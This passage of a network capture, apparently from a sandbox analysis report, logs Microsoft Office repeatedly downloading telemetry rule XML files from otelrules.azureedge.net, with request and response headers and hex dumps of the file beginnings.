                                                                                                                    2024-11-30 10:35:38 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:38 UTC515INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:38 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 2284
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                    ETag: "0x8DC582BCD58BEEE"
                                                                                                                    x-ms-request-id: ab0c55e0-101e-00a2-20a2-429f2e000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103538Z-174f7845968xlwnmhC1EWR0sv8000000114g000000004s0y
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:38 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    117192.168.2.44986713.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:38 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:39 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:38 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1393
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                    ETag: "0x8DC582BE3E55B6E"
                                                                                                                    x-ms-request-id: 5ef45d95-201e-005d-64f2-41afb3000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103538Z-174f7845968jrjrxhC1EWRmmrs00000011g0000000002z42
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:39 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    118192.168.2.44986813.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:39 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:39 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:39 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1356
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                    ETag: "0x8DC582BDC681E17"
                                                                                                                    x-ms-request-id: 2c9dd3b5-d01e-0049-7af2-41e7dc000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103539Z-174f7845968qj8jrhC1EWRh41s0000001150000000008gu5
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:39 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    119192.168.2.44986913.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:39 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:39 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:39 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1393
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                    ETag: "0x8DC582BE39DFC9B"
                                                                                                                    x-ms-request-id: e56afb1e-801e-0083-3991-3ff0ae000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103539Z-174f78459685m244hC1EWRgp2c000000111000000000aa22
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:39 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    120192.168.2.44987013.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:39 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:40 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:39 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1356
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                    ETag: "0x8DC582BDF66E42D"
                                                                                                                    x-ms-request-id: c2b00c79-201e-0000-27b2-42a537000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103539Z-174f7845968swgbqhC1EWRmnb400000011hg000000001h96
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:40 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    121192.168.2.44987213.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:40 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:41 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:41 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1358
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                    ETag: "0x8DC582BE6431446"
                                                                                                                    x-ms-request-id: 52878fcf-c01e-00ad-731d-41a2b9000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103541Z-174f7845968swgbqhC1EWRmnb400000011g0000000003en7
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:41 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    122192.168.2.44987313.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:41 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:41 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:41 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1395
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                    ETag: "0x8DC582BDE12A98D"
                                                                                                                    x-ms-request-id: 6ff37f82-301e-001f-5b9a-42aa3a000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103541Z-174f7845968glpgnhC1EWR7uec00000011fg0000000042vb
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:41 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    123192.168.2.44987413.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:41 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:41 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:41 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1358
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                    ETag: "0x8DC582BE022ECC5"
                                                                                                                    x-ms-request-id: 12481441-f01e-001f-6fb2-425dc8000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103541Z-174f7845968nxc96hC1EWRspw80000001120000000004905
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:41 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    124192.168.2.44987513.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:41 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:42 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:42 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1389
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                    ETag: "0x8DC582BE10A6BC1"
                                                                                                                    x-ms-request-id: 254393c3-001e-0066-2422-41561e000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103542Z-174f7845968xlwnmhC1EWR0sv80000001150000000004ebk
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:42 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    125192.168.2.44987613.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:43 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:43 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:43 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1352
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                    ETag: "0x8DC582BE9DEEE28"
                                                                                                                    x-ms-request-id: 53226452-801e-0083-655f-40f0ae000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103543Z-174f7845968cdxdrhC1EWRg0en000000119g000000003m2m
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:43 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    126192.168.2.44987113.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:43 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:43 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:43 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1395
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
